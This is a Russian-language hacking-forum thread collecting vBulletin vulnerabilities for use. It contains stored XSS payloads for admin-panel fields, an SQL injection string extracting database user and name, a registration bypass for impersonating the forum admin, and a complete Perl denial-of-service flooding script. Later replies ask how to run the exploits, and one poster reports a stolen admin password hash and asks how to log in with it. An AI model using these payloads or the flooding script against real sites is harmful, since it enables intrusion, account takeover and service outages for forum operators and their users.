Старый 18.02.2011, 18:22   #11
therf2
RAM 256MB
 
Аватар для therf2
 
Регистрация: 17.12.2010
Сообщений: 320
therf2 - весьма и весьма положительная личностьtherf2 - весьма и весьма положительная личность
therf2 вне форума

По умолчанию Обзор уязвимостей vBulletin


3.8.0 RC2
[HIDE]1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.

2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

Secure Downloads for vBulletin 'fileinfo.php' SQL Injection Vulnerability


[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.], 1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE( ),0,0,0,0,0,0,0+OR+'1'='0[/HIDE]

Добавлено через 2 минуты 17 секунд
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
[HIDE]01010101010101010101010101010101010101010101010101 0101010
0 0
1 Iranian Datacoders Security Team 2010 1
0 0
01010101010101010101010101010101010101010101010101 0101010


# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010
# Author: Immortal Boy
# Software Link: [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
# Version: 3.8.4 & 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A

# BUG : ################################################## #######################

1 > Go to [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]

2 > Assume that forum admin user name is ADMIN

3 > Type this at User Name ===> ADMIN

4 > is an ASCII Code

5 > And complete the other parameters

6 > Then click on Complete Registrarion

7 > Now you see that your user name like admin user name

After this time the private messages to the user (ADMIN) to sending see for you is sending .


# Patch : ################################################## #####################

1 > Go to AdminCP

2 > Click on vBulletin Options and choose vBulletin Options

3 > Choose Censorship Options

4 > type *** in Censored Words section

5 > Then click on Save

################################################## ###########################

Our Website : [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]

Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,

hosinn , NIK , uones , mohammad_ir & all iranian datacoders members

################################################## ###########################[/HIDE]

Добавлено через 56 секунд
Vbulletin 4.0.6
[HIDE]################################################
Author : KnocKout
Thanks : DaiMon,BARCOD3
Contact : knockoutr@msn.com
Tested on : redhat
##############################################
##################vBulletin 4.0.6 - Danial Of Service Exploit for RedHat###############

#!/usr/bin/perl

use IO::Socket;

print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
print "+ vBulletin 4.0.6 D.O.S Exploit(FOR redhat) +\n";
print "+ Coded by KnocKout +\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n";
print "Host |without [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
{
while($x != 999999)
{
$postit = "?t=000000000000000000000000000000000000000000 0000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nOffline! - We can not Connect To '$host' it May be DoSed\n" unless $sock;

print $sock "POST $pth/showthread.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "Attack Started ";
$x++;
}
}[/HIDE]
  Ответить с цитированием
Последний раз редактировалось therf2; 18.02.2011 в 18:22. Причина: Добавлено сообщение
Ответ: Обзор уязвимостей vBulletin
Старый 15.04.2011, 19:51   #12
Fooog
«¤†‡°°‡†¤
 
Аватар для Fooog
 
Регистрация: 27.01.2011
Сообщений: 574
Fooog как роза среди колючекFooog как роза среди колючекFooog как роза среди колючекFooog как роза среди колючек
Fooog вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

m@kar, ищи в интернете что такое эксплойты, что это такое, как их юзать и т.д.
Но лучше начни с банального. Почитай что такое SQL-inj
__________________
Настоятельно рекомендуем при сделках использовать гарант-сервис.
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 25.11.2011, 23:40   #13
filudskou4
Юзверь
 
Аватар для filudskou4
 
Регистрация: 25.11.2011
Сообщений: 1
filudskou4 Новичок
filudskou4 вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Пишет server not valid, что делать?
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 26.11.2011, 00:03   #14
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Цитата:
Сообщение от filudskou4 Посмотреть сообщение
Пишет server not valid, что делать?
О какой именно ты уязвимости:?
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 06.01.2012, 20:09   #15
vitexrus
Юзверь
 
Аватар для vitexrus
 
Регистрация: 06.01.2012
Сообщений: 1
vitexrus Новичок
vitexrus вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Есть программа сразу ищет уязвимости в хss. в инете VB_exploit_v1.1
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 25.05.2012, 17:20   #16
Xins
RAM 2MB
 
Аватар для Xins
 
Регистрация: 23.05.2012
Сообщений: 2
Xins Новичок
Xins вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

А есть уязвимости в vBuletin 3.8.4?
  Ответить с цитированием
Ответ: Обзор уязвимостей vBulletin
Старый 08.08.2013, 20:18   #17
HTML6
Юзверь
 
Аватар для HTML6
 
Регистрация: 08.08.2013
Сообщений: 1
HTML6 Новичок
HTML6 вне форума
По умолчанию Ответ: Обзор уязвимостей vBulletin

Вобщемто достал этим сплоитом [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.], хеш админа vBulletin 4.0.1: 33b62f147f222695f8a20074395f6739
Но что бы расшифровать пароль нужна еще соль. Как мне достать ее, зная только этот хеш. И как войти по хешу в профиль админа?
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot